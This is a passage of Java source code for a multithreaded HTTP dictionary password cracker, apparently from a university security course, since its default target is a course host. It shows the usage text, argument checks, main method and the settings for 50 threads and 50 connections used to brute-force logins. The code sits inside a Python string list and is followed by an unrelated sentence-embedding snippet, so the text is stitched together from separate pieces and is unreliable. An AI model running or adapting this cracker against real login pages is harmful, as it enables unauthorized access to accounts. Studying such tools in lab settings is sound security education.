] *********************\");\n System.out.println();\n System.out.println(\" Number of attempts : \"+attempt+\" of \"+ALLCOMBI+\" total combinations\");\n System.out.println(\" Attempt position : \"+fmt.format((double)attempt/(double)ALLCOMBI*100)+\"%\");\n System.out.println(\" Overal attempt rate : \"+fmt.format(ovAps)+ \" attempts/sec\");\n System.out.println(\" Cracking time : \"+String.valueOf(((double)end-(double)d)/1000) + \" seconds\");\n System.out.println();\n System.out.println(\" ***************************************************************************\");\n System.out.println();\n }\n }\n }\n \n \n public static void printSyntax() {\n System.out.println();\n System.out.println(\"Syntax : Dictionary [mode] [URL] [] [] [username]\");\n System.out.println();\n System.out.println(\" mode : (opt) 0 - NAIVE Dictionary mode\");\n System.out.println(\" (trying from the first the last combinations)\");\n System.out.println(\" 1 - ENHANCED Dictionary mode\");\n System.out.println(\" (dividing cracking jobs multiple threads) (default)\");\n System.out.println(\" URL : (opt) the URL crack \");\n System.out.println(\" (default : http://sec-crack.cs.rmit.edu./SEC/2/index.php)\");\n System.out.println(\" , : (optional) range of characters applied in the cracking\");\n System.out.println(\" where 1 <= <= 255 (default = 1)\");\n System.out.println(\" <= <= 255 (default = 3)\");\n System.out.println(\" username : (optional) the username that is used crack\");\n System.out.println();\n System.out.println(\" NOTE: The optional parameters '','', and 'username'\");\n System.out.println(\" have specified altogether none at all.\");\n System.out.println(\" For example, if [] is specified, then [], and [username]\");\n System.out.println(\" have specified as well. 
If none of them specified,\");\n System.out.println(\" default values used.\");\n System.out.println();\n System.out.println(\" Example of invocation :\");\n System.out.println(\" java Dictionary \");\n System.out.println(\" java Dictionary 0\");\n System.out.println(\" java Dictionary 1 http://localhost/tryme.php\");\n System.out.println(\" java Dictionary 0 http://localhost/tryme.php 1 3 \");\n System.out.println(\" java Dictionary 1 http://localhost/tryme.php 1 10 \");\n System.out.println();\n System.out.println();\n }\n \n \n public static void paramCheck(String[] args) {\n int argc = args.length;\n \n \n try {\n switch (Integer.valueOf(args[0]).intValue()) {\n case 0: {\n isenhanced = false;\n } break;\n case 1: {\n isenhanced = true;\n } break;\n default:\n System.out.println(\"Syntax error : invalid mode '\"+args[0]+\"'\");\n printSyntax();\n System.exit(1);\n }\n } catch (NumberFormatException e) {\n System.out.println(\"Syntax error : invalid number '\"+args[0]+\"'\");\n printSyntax();\n System.exit(1);\n }\n \n if (argc>1) {\n try {\n \n URL u = new URL(args[1]);\n \n \n try {\n HttpURLConnection conn = (HttpURLConnection) u.openConnection();\n \n switch (conn.getResponseCode()) {\n case HttpURLConnection.HTTP_ACCEPTED:\n case HttpURLConnection.HTTP_OK:\n case HttpURLConnection.HTTP_NOT_AUTHORITATIVE:\n case HttpURLConnection.HTTP_FORBIDDEN:\n case HttpURLConnection.HTTP_UNAUTHORIZED:\n break;\n default:\n \n \n System.out.println(\"Unable open connection the URL '\"+args[1]+\"'\");\n System.exit(1);\n }\n } catch (IOException e) {\n System.out.println(e);\n System.exit(1);\n }\n \n THEURL = args[1];\n } catch (MalformedURLException e) {\n \n System.out.println(\"Invalid URL '\"+args[1]+\"'\");\n printSyntax();\n System.exit(1);\n }\n }\n \n \n if (argc==5) {\n try {\n MINCHAR = Integer.valueOf(args[2]).intValue();\n } catch (NumberFormatException e) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"'\");\n printSyntax();\n 
System.exit(1);\n }\n \n try {\n MAXCHAR = Integer.valueOf(args[3]).intValue();\n } catch (NumberFormatException e) {\n System.out.println(\"Invalid range number value '\"+args[3]+\"'\");\n printSyntax();\n System.exit(1);\n }\n \n if ((MINCHAR<1) || (MINCHAR>255)) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"' (must between 0 and 255)\");\n printSyntax();\n System.exit(1);\n } else\n if (MINCHAR>MAXCHAR) {\n System.out.println(\"Invalid range number value '\"+args[2]+\"' (must lower than the value)\");\n printSyntax();\n System.exit(1);\n }\n \n if (MAXCHAR>255) {\n System.out.println(\"Invalid range number value '\"+args[3]+\"' (must between value and 255)\");\n printSyntax();\n System.exit(1);\n }\n \n USERNAME = args[4];\n } else\n if ((argc>2) && (argc<5)) {\n System.out.println(\"Please specify the [], [], and [username] altogether none at all\");\n printSyntax();\n System.exit(1);\n } else\n if ((argc>2) && (argc>5)) {\n System.out.println(\"The number of parameters expected is not more than 5. 
\");\n System.out.println(\" have specified more than 5 parameters.\");\n printSyntax();\n System.exit(1);\n }\n }\n \n public static void main(String[] args) {\n MINCHAR = 1;\n MAXCHAR = 3; \n \n \n if (args.length==0) {\n args = new String[5];\n args[0] = String.valueOf(1); \n args[1] = THEURL;\n args[2] = String.valueOf(MINCHAR);\n args[3] = String.valueOf(MAXCHAR);\n args[4] = USERNAME;\n }\n \n \n paramCheck(args);\n \n \n readThroughDictionary();\n \n \n Application = new Dictionary();\n }\n \n public static Dictionary Application;\n public static String THEURL\t\t= \"http://sec-crack.cs.rmit.edu./SEC/2/index.php\";\n public static String DICTIONARY = System.getProperty(\"user.dir\")+\"/words\";\n public static String TEMPDICT = System.getProperty(\"user.dir\")+\"/~words\";\n public static boolean isenhanced;\t\t\n public static String passw\t\t= \"\";\t\n \n public static final int REPORT_INTERVAL = 1; \n public static int MAXTHREAD = 50; \n public static int MAXCONN = 50; \n public static int\t curconn = 0; \n public static int success = -1; \n \n public static String USERNAME = \"\"; \n public static int MINCHAR; \n public static int MAXCHAR; \n public static int ALLCOMBI; \n \n public static int start ,end; \n public static int MAXCACHE = 100; \n \n public static java.util.Timer reportTimer; \n public static HttpURLConnection connections[] = new HttpURLConnection[MAXCONN]; \n public static boolean\t connused[]\t = new boolean[MAXCONN]; \n public ThCrack[] threads = new ThCrack[MAXTHREAD]; \n public static int attempt = 0; \n public static int idxLimit;\t\t \n}\n" ] embeddings = model.encode(sentences) similarities = model.similarity(embeddings, embeddings) print(similarities.shape) # [4, 4]